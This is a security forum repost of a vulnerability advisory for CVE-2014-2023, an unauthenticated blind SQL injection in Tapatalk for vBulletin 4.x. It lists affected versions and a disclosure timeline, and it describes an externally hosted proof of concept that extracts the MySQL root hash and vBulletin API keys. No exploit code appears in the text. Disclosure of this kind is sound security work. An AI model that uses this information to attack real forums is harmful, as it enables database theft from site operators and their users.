Jump to content
Nytro

CVE-2014-2023 - Tapatalk for vbulletin 4.x - multiple blind sql injection (pre-auth)

By Nytro, in Exploituri

Recommended Posts

Nytro Mentor

Nytro

Posted
Posted

[h=1]CVE-2014-2023 - Tapatalk for vbulletin 4.x - multiple blind sql injection (pre-auth)[/h] [h=2]Overview[/h] date : 10/12/2014

cvss : 7.8 (AV:N/AC:L/Au:N/C:C/I:N/A:N) base

cwe : 89

vendor : Tapatalk Inc

product : Tapatalk for vBulletin 4.x

versions affected: latest (to date)

5.2.1 (verified)

4.9.0 (verified)

exploitability :

* remotely exploitable

* NO authentication required

* NO user interaction required

* NO special configuration required (default settings)

[h=2]Abstract[/h] Tapatalk for vBulletin 4.x does not properly sanitize some xmlrpc calls

allowing unauthenticated users to inject arbitrary SQL commands.

risk: high

!! Note !! - this is a preliminary VulnNote. The full PoC / Description will

be made available within the next 7 days (see contact) to allow mobiquo to

fix this.

googledork: see PoC code

[h=2]Details[/h] vulnerable component:

* stripped // see full VulnNote - (contact)

xmlrpc request is decoded, decoded attacker provided values are directly

being used in sql query.

[h=2]Proof of Concept (PoC)[/h] see https://github.com/tintinweb/pub/tree/master/pocs/cve-2014-2023

1) prerequesites

vBulletin 4.x with Tapatalk for vBulletin 4.x installed

2) run PoC

edit PoC to match your TARGET (, optionally DEBUG=True)

(optionally) edit your query to extract specific database values

Note: PoC will try to detect tapatalk on that host

run PoC

by default extracts

* mysql root hash (in case vBulletin db user has permissions to do so)

* vbulletin db record fields (apikey) - perfectly chains with CVE-2014-2023

only limited by the vBulletin db_user access permissions

[h=2]Timeline[/h] 2014-01-14: initial vendor contact, no response

2014-02-24: vendor contact, no response

2014-10-13: public disclosure

[h=2]Contact[/h] tintinweb - https://github.com/tintinweb/pub/tree/master/pocs/cve-2014-2023

Sursa: https://github.com/tintinweb/pub/tree/master/pocs/cve-2014-2023

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...